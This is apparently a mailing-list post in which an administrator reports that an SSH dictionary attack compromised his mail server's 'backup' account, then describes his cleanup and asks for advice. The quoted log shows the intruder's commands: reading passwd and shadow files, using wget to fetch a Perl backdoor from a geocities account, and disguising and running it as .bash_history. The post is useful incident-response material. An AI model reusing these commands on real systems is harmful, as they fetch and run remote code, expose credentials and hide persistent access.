Compromised system - still ok?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi everybody,
guess it was my time - this time...
Ok .. about 4 hours ago the following happened on one of my machines:
1) Somebody tried from one host (213.215.220.14) a dictionary attack
2) He/She/It got in using the user backup (I know.. I know ..)
3) H/S/I downloaded 2 files from a geocities.com account
4) File 1 - no idea what it is or what it does - cannot find it
5) File 2 - a perl script that "claims" to be a telnet server
After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done
a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis
Here is the snoopy log:
- ----
Feb 6 10:33:26 mail2 sshd[15544]: Accepted password for backup from
213.215.220.14 port 38842 ssh2
Feb 6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user
backup by (uid=0)
Feb 6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb 6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb 6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user
backup
Feb 6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for
backup from 66.40.38.102 port 45424 ssh2
Feb 6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user
backup by (uid=0)
Feb 6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb 6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb 6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb 6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname
- -a
Feb 6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat
/etc/passwd
Feb 6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]:
/sbin/ifconfig
Feb 6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat
/etc/hosts
Feb 6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb 6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget
geocities.com/c0_pampers/jam5.p
Feb 6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat
shadow.bak
Feb 6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget
geocities.com/c0_pampers/jam5.p
Feb 6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv
jam5.pl.txt .bash_history
Feb 6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod
755 .bash_history
Feb 6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl
.bash_history
Feb 6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb 6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb 6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb 6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user
backup
- ----
The telnetserver doesn't seem to make any entires in wtmp hence no
`last` or `w` entries on the machine.
However, snoopy still sees uses from the user :)
ASAI can say H/S/I hasn't been on my machine since. The firewall didn't
permit access to the port (34567)
opened by the perl script and my firewall log says no access to that
port before I tried it from localhost.
The machine runs a linux 2.4.27-grsec-hi woody testing
I'm considering taking it back online with a 2.4.29-grsec-hi, what do
you guys think?
- - Many thanks, Peter
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)
iEYEARECAAYFAkIGSmMACgkQ7qdt1xpQls/FOwCfSDJbpUyuAMES5KYMQKQMVcCd
im0AoIhY+DeJghyPAGm2Fv4RAuWvycQV
=ctGL
-----END PGP SIGNATURE-----
Reply to: